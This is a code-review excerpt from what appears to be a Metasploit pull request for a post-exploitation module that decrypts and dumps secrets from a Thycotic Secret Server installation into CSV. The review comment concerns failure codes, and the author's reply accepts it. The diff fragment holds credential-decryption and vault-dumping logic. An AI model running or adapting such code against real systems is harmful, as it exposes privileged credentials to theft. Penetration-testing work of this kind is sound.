modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb

```diff
@@ -0,0 +1,449 @@
+      value_1 = [value_1_hex].pack('H*')
+      miv = [miv_hex].pack('H*')
+      key = [key_hex].pack('H*')
+      iv = [iv_hex].pack('H*')
+      if secret_encrypted == 1
+        secret_plaintext_1 = thycotic_secret_decrypt(secret_id: secret_id, secret_field: secret_field, secret_value: value_1, secret_key: key, secret_iv: iv, secret_miv: miv, secret_use256: secret_use256)
+        if secret_plaintext_1.nil?
+          vprint_warning("SecretID #{secret_id} field #{secret_field} ItemValue nil, excluding")
+          blank_rows += 1
+          next
+        end
+        # TODO: Figure out how ItemValue2 is encrypted; it does not match the structure of ItemValue.
+        # For now just return ciphertext if it exists.
+        secret_plaintext_2 = secret_ciphertext_2
+        if !secret_plaintext_1 || !secret_plaintext_2
+          print_error("SecretID #{secret_id} field #{secret_field} failed to decrypt")
+          vprint_error(row.to_s)
+          failed_rows += 1
+          next
+        end
+        secret_disposition = 'decrypted'
+        decrypted_rows += 1
+      else
+        secret_plaintext_1 = secret_ciphertext_1
+        if secret_plaintext_1.nil?
+          vprint_warning("SecretID #{secret_id} field #{secret_field} ItemValue nil, excluding")
+          blank_rows += 1
+          next
+        end
+        secret_plaintext_2 = secret_ciphertext_2
+        secret_disposition = 'plaintext'
+        plaintext_rows += 1
+      end
+      if !secret_plaintext_1.empty? && !secret_plaintext_2.empty?
+        result_line = [secret_id.to_s, secret_lastmod.to_s, secret_active.to_s, secret_type.to_s, secret_name.to_s, secret_field.to_s, secret_plaintext_1.to_s, secret_plaintext_2.to_s]
+        result_row = CSV.parse_line(CSV.generate_line(result_line).gsub("\r", ''))
+        result_csv << result_row
+        vprint_status("SecretID #{secret_id} field #{secret_field} ItemValue recovered: #{secret_disposition}")
+      else
+        vprint_warning("SecretID #{secret_id} field #{secret_field} ItemValue empty, excluding")
+        blank_rows += 1
+      end
+    end
+    @ss_processed_rows = current_row
+    @ss_blank_rows = blank_rows
+    @ss_decrypted_rows = decrypted_rows
+    @ss_plaintext_rows = plaintext_rows
+    @ss_failed_rows = failed_rows
+    result_csv
+  end
+
+  def get_secretserver_config
+    @ss_hostname = get_env('COMPUTERNAME')
+    print_status("Hostname #{@ss_hostname} IPv4 #{rhost}")
+    reg_key = 'HKLM\\SOFTWARE\\Thycotic\\Secret Server\\'
+    fail_with(Msf::Exploit::Failure::NoTarget, "Registry key #{reg_key} not found") unless registry_key_exist?(reg_key)
+    ss_web_path = registry_getvaldata(reg_key, 'WebDir')
+    fail_with(Msf::Exploit::Failure::NoTarget, "Could not find WebDir registry entry under #{reg_key}") unless ss_web_path
+    ss_version_xml_file = ss_web_path + 'Version.xml'
+    fail_with(Msf::Exploit::Failure::NoTarget, "Could not find #{ss_version_xml_file}") unless file_exist?(ss_version_xml_file)
```

Comment:
Seems more like a `NotFound` to me "A preexisting file or resource on target is missing."
```suggestion
    fail_with(Msf::Exploit::Failure::NotFound, "Registry key #{reg_key} not found") unless registry_key_exist?(reg_key)
    ss_web_path = registry_getvaldata(reg_key, 'WebDir')
    fail_with(Msf::Exploit::Failure::NotFound, "Could not find WebDir registry entry under #{reg_key}") unless ss_web_path
    ss_version_xml_file = ss_web_path + 'Version.xml'
    fail_with(Msf::Exploit::Failure::NotFound, "Could not find #{ss_version_xml_file}") unless file_exist?(ss_version_xml_file)
```

Reply:
Thanks for this, apparently I have to read up.